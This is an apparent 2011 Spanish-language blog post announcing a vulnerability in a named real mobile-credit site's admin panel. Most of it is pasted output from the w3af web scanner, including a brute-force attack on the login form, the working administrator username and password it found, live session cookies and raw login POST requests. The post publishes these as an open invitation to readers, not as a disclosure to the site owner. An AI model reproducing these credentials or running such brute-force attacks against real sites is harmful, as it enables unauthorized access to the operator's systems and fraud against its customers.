lunes, 6 de junio de 2011

Vulnerabilidad en www.dait.mx/index.php/admin

Saludos Mundo Libre.

He aqui una web vulnerable esta es para ponerle credito en line a tu celular.

[Mon 06 Jun 2011 07:43:43 PM CDT] Auto-enabling plugin: grep.collectCookies

[Mon 06 Jun 2011 07:43:43 PM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Mon 06 Jun 2011 07:43:43 PM CDT] Auto-enabling plugin: grep.error500
[Mon 06 Jun 2011 07:43:43 PM CDT] Auto-enabling plugin: discovery.serverHeader
[Mon 06 Jun 2011 07:43:43 PM CDT] Auto-enabling plugin: discovery.allowedMethods
[Mon 06 Jun 2011 07:43:43 PM CDT] Auto-enabling plugin: discovery.frontpage_version
[Mon 06 Jun 2011 07:43:43 PM CDT] Auto-enabling plugin: grep.passwordProfiling
[Mon 06 Jun 2011 07:43:43 PM CDT] Auto-enabling plugin: grep.getMails
[Mon 06 Jun 2011 07:43:44 PM CDT] Auto-enabling plugin: grep.lang
[Mon 06 Jun 2011 07:43:51 PM CDT] The "lang" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 06 Jun 2011 07:43:56 PM CDT] The "passwordProfiling" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 06 Jun 2011 07:44:11 PM CDT] The page language is: es
[Mon 06 Jun 2011 07:44:11 PM CDT] The server header for the remote web server is: "Apache". This information was found in the request with id 16.
[Mon 06 Jun 2011 07:44:11 PM CDT] "x-powered-by" header for this HTTP server is: "PHP/5.2.17". This information was found in the request with id 17.
[Mon 06 Jun 2011 07:44:33 PM CDT] Starting formAuthBrute plugin execution.
[Mon 06 Jun 2011 07:44:37 PM CDT] Found a form login. The action of the form is: "http://www.dait.mx/index.php/admin".
[Mon 06 Jun 2011 07:44:37 PM CDT] The username field to be used is: "login[username]".
[Mon 06 Jun 2011 07:44:37 PM CDT] The password field to be used is: "login[password]".
[Mon 06 Jun 2011 07:44:37 PM CDT] Starting form authentication bruteforce on URL: "http://www.dait.mx/index.php/admin".
[Mon 06 Jun 2011 07:46:10 PM CDT] The thread: raised an exception while running the request: >
[Mon 06 Jun 2011 07:46:10 PM CDT] Exception: Too many retries (2) while requesting: http://www.dait.mx/index.php/admin
[Mon 06 Jun 2011 07:46:10 PM CDT] Traceback: Traceback (most recent call last):
File "/usr/share/w3af/core/controllers/threads/threadpool.py", line 108, in run
self.resultQueue.put( (request, request.callable(*request.args, **request.kwds)) )
File "/usr/share/w3af/plugins/bruteforce/formAuthBrute.py", line 285, in _bruteWorker
response = self._sendMutant( freq, analyze=False, grepResult=False )
File "/usr/share/w3af/core/controllers/basePlugin/basePlugin.py", line 176, in _sendMutant
'useCache': True } )
File "/usr/share/w3af/core/data/url/xUrllib.py", line 306, in POST
return self._send( req , grepResult=grepResult, useCache=useCache)
File "/usr/share/w3af/core/data/url/xUrllib.py", line 469, in _send
return self._retry( req, useCache )
File "/usr/share/w3af/core/data/url/xUrllib.py", line 575, in _retry
return self._send( req, useCache )
File "/usr/share/w3af/core/data/url/xUrllib.py", line 469, in _send
return self._retry( req, useCache )
File "/usr/share/w3af/core/data/url/xUrllib.py", line 575, in _retry
return self._send( req, useCache )
File "/usr/share/w3af/core/data/url/xUrllib.py", line 469, in _send
return self._retry( req, useCache )
File "/usr/share/w3af/core/data/url/xUrllib.py", line 584, in _retry
raise w3afException( msg )
w3afException: Too many retries (2) while requesting: http://www.dait.mx/index.php/admin

[Mon 06 Jun 2011 07:46:59 PM CDT] The thread: raised an exception while running the request: >
[Mon 06 Jun 2011 07:46:59 PM CDT] Exception: Too many retries (2) while requesting: http://www.dait.mx/index.php/admin
[Mon 06 Jun 2011 07:46:59 PM CDT] Traceback: Traceback (most recent call last):
File "/usr/share/w3af/core/controllers/threads/threadpool.py", line 108, in run
self.resultQueue.put( (request, request.callable(*request.args, **request.kwds)) )
File "/usr/share/w3af/plugins/bruteforce/formAuthBrute.py", line 285, in _bruteWorker
response = self._sendMutant( freq, analyze=False, grepResult=False )
File "/usr/share/w3af/core/controllers/basePlugin/basePlugin.py", line 176, in _sendMutant
'useCache': True } )
File "/usr/share/w3af/core/data/url/xUrllib.py", line 306, in POST
return self._send( req , grepResult=grepResult, useCache=useCache)
File "/usr/share/w3af/core/data/url/xUrllib.py", line 469, in _send
return self._retry( req, useCache )
File "/usr/share/w3af/core/data/url/xUrllib.py", line 575, in _retry
return self._send( req, useCache )
File "/usr/share/w3af/core/data/url/xUrllib.py", line 469, in _send
return self._retry( req, useCache )
File "/usr/share/w3af/core/data/url/xUrllib.py", line 575, in _retry
return self._send( req, useCache )
File "/usr/share/w3af/core/data/url/xUrllib.py", line 469, in _send
return self._retry( req, useCache )
File "/usr/share/w3af/core/data/url/xUrllib.py", line 584, in _retry
raise w3afException( msg )
w3afException: Too many retries (2) while requesting: http://www.dait.mx/index.php/admin

[Mon 06 Jun 2011 07:46:59 PM CDT] Too many retries (2) while requesting: http://www.dait.mx/index.php/admin
[Mon 06 Jun 2011 07:47:32 PM CDT] Found authentication credentials to: "http://www.dait.mx/index.php/admin". A correct user and password combination is: admin/n1md4. This vulnerability was found in the request with id 466.
[Mon 06 Jun 2011 07:47:46 PM CDT] Password profiling TOP 100:
[Mon 06 Jun 2011 07:47:46 PM CDT] - [1] Magento with 384 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [2] your with 141 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [3] been with 139 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [4] processing with 138 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [5] There with 138 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [6] request with 138 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [7] NAMES with 69 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [8] Nombre with 68 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [9] Copyright with 58 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [10] trademark with 58 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [11] Global with 36 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [12] Networks with 36 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [13] Ideas3 with 36 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [14] Acceso with 35 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [15] Licencia with 35 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [16] loginForm with 35 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [17] Host with 35 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [18] input with 35 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [19] Ingresar with 35 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [20] Design with 35 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [21] Autorizado with 35 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [22] Personal with 35 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [23] Panel with 35 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [24] Exclusivo with 35 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [25] usuario with 33 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [26] more with 25 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [27] than with 24 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [28] connections with 23 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [29] active with 23 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [30] record with 23 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [31] User with 23 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [32] already with 23 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [33] enter with 16 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [34] escriba with 15 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [35] valid with 12 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [36] this with 12 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [37] este with 10 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [38] only with 10 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [39] letters with 7 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [40] example with 7 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [41] card with 6 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [42] numbers with 6 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [43] Distribuidor with 6 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [44] letras with 5 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [45] spaces with 4 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [46] seleccione with 4 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [47] credit with 4 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [48] espacios with 4 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [49] number with 4 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [50] select with 4 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [51] Nokia with 3 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [52] character with 3 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [53] first with 3 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [54] AMIGO with 2 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [55] mayor with 2 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [56] should with 2 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [57] match with 2 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [58] Sony with 2 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [59] postal with 2 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [60] ejemplo with 2 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [61] Contacto with 2 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [62] desde with 2 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [63] como with 2 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [64] Planes with 2 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [65] DAIT with 2 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [66] Ericsson with 2 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [67] otros with 2 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [68] especifique with 2 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [69] specify with 2 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [70] must with 2 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [71] will with 2 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [72] permite with 2 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [73] JavaScript with 2 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [74] tarjeta with 2 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [75] other with 2 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [76] characters with 2 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [77] Amigo with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [78] Pasatiempo with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [79] principio with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [80] Empresariales with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [81] Yucat with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [82] correo with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [83] Huawei with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [84] primer with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [85] register with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [86] EMPRESA with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [87] Lanix with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [88] SERVICIOS with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [89] Frecuentes with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [90] carrito with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [91] fecha with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [92] Zonda with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [93] Translator with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [94] monto with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [95] choose with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [96] Realizar with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [97] marzo with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [98] greater with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [99] seguridad with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] - [100] ticas with 1 repetitions.
[Mon 06 Jun 2011 07:47:46 PM CDT] An unidentified web application error (HTTP response code 500) was found at: "http://www.dait.mx/index.php/admin". Enable all plugins and try again, if the vulnerability still is not identified, please verify mannually and report it to the w3af developers. This vulnerability was found in the request with id 87.
[Mon 06 Jun 2011 07:47:46 PM CDT] The URL: "http://www.dait.mx/index.php/_vti_inf.html" sent these cookies:
[Mon 06 Jun 2011 07:47:46 PM CDT] - frontend=i2vl2bs7o1mvj2ks0d96n5uq73; expires=Tue, 07-Jun-2011 01:44:32 GMT; path=/; domain=www.dait.mx; httponly
[Mon 06 Jun 2011 07:47:46 PM CDT] The URL: "http://www.dait.mx/index.php/admin" sent these cookies:
[Mon 06 Jun 2011 07:47:46 PM CDT] - adminhtml=jir3ar00i3cmbmhdl8arn2s603; expires=Tue, 07-Jun-2011 01:45:04 GMT; path=/; domain=www.dait.mx; httponly
[Mon 06 Jun 2011 07:47:46 PM CDT] - adminhtml=jir3ar00i3cmbmhdl8arn2s603; expires=Tue, 07-Jun-2011 01:46:49 GMT; path=/; domain=www.dait.mx; httponly
[Mon 06 Jun 2011 07:47:46 PM CDT] - adminhtml=jir3ar00i3cmbmhdl8arn2s603; expires=Tue, 07-Jun-2011 01:47:45 GMT; path=/; domain=www.dait.mx; httponly
[Mon 06 Jun 2011 07:47:46 PM CDT] - adminhtml=jir3ar00i3cmbmhdl8arn2s603; expires=Tue, 07-Jun-2011 01:46:47 GMT; path=/; domain=www.dait.mx; httponly
[Mon 06 Jun 2011 07:47:46 PM CDT] - adminhtml=jir3ar00i3cmbmhdl8arn2s603; expires=Tue, 07-Jun-2011 01:47:41 GMT; path=/; domain=www.dait.mx; httponly
[Mon 06 Jun 2011 07:47:46 PM CDT] - adminhtml=jir3ar00i3cmbmhdl8arn2s603; expires=Tue, 07-Jun-2011 01:43:45 GMT; path=/; domain=www.dait.mx; HttpOnly
[Mon 06 Jun 2011 07:47:46 PM CDT] The URL: "http://www.dait.mx/index.php/" sent these cookies:
[Mon 06 Jun 2011 07:47:46 PM CDT] - frontend=i2vl2bs7o1mvj2ks0d96n5uq73; expires=Tue, 07-Jun-2011 01:44:30 GMT; path=/; domain=www.dait.mx; httponly
[Mon 06 Jun 2011 07:47:46 PM CDT]
[Mon 06 Jun 2011 07:47:46 PM CDT] Unhandled error, traceback: Traceback (most recent call last):
File "/usr/share/w3af/core/controllers/w3afCore.py", line 417, in start
self._realStart()
File "/usr/share/w3af/core/controllers/w3afCore.py", line 603, in _realStart
raise e
w3afException: Too many retries (2) while requesting: http://www.dait.mx/index.php/admin

[Mon 06 Jun 2011 07:47:46 PM CDT]

formAuthBrute:auth:Guessable credentials:


Found authentication credentials to: "http://www.dait.mx/index.php/admin". A correct user and password combination is: admin/n1md4. This vulnerability was found in the request with id 466.

error500:error500

Unhanbled erro in web application:23

An unidentified web application error (HTTP response code 500) was found at: "http://www.dait.mx/index.php/admin". Enable all plugins and try again, if the vulnerability still is not identified, please verify mannually and report it to the w3af developers. This vulnerability was found in the request with id 87.

POST http://www.dait.mx/index.php/admin HTTP/1.1
Accept-encoding: identity
Accept: */*
User-agent: w3af.sourceforge.net
Host: www.dait.mx
Cookie: path=/; domain=www.dait.mx; expires=Tue, 07-Jun-2011 01:43:45 GMT; adminhtml=jir3ar00i3cmbmhdl8arn2s603;
Content-type: application/x-www-form-urlencoded

login%5Busername%5D=admin&login%5Bpassword%5D=999&form_key=1

An unidentified web application error (HTTP response code 500) was found at: "http://www.dait.mx/index.php/admin". Enable all plugins and try again, if the vulnerability still is not identified, please verify mannually and report it to the w3af developers. This vulnerability was found in the request with id 89.

POST http://www.dait.mx/index.php/admin HTTP/1.1
Accept-encoding: identity
Accept: */*
User-agent: w3af.sourceforge.net
Host: www.dait.mx
Cookie: path=/; domain=www.dait.mx; expires=Tue, 07-Jun-2011 01:43:45 GMT; adminhtml=jir3ar00i3cmbmhdl8arn2s603;
Content-type: application/x-www-form-urlencoded

login%5Busername%5D=admin&login%5Bpassword%5D=admini57ra7ion&form_key=1

An unidentified web application error (HTTP response code 500) was found at: "http://www.dait.mx/index.php/admin". Enable all plugins and try again, if the vulnerability still is not identified, please verify mannually and report it to the w3af developers. This vulnerability was found in the request with id 93.

An unidentified web application error (HTTP response code 500) was found at: "http://www.dait.mx/index.php/admin". Enable all plugins and try again, if the vulnerability still is not identified, please verify mannually and report it to the w3af developers. This vulnerability was found in the request with id 94.

An unidentified web application error (HTTP response code 500) was found at: "http://www.dait.mx/index.php/admin". Enable all plugins and try again, if the vulnerability still is not identified, please verify mannually and report it to the w3af developers. This vulnerability was found in the request with id 97.

An unidentified web application error (HTTP response code 500) was found at: "http://www.dait.mx/index.php/admin". Enable all plugins and try again, if the vulnerability still is not identified, please verify mannually and report it to the w3af developers. This vulnerability was found in the request with id 222.

An unidentified web application error (HTTP response code 500) was found at: "http://www.dait.mx/index.php/admin". Enable all plugins and try again, if the vulnerability still is not identified, please verify mannually and report it to the w3af developers. This vulnerability was found in the request with id 476.


Hay Se las dejo

Saludos Mundo Libre.





No hay comentarios:

Publicar un comentario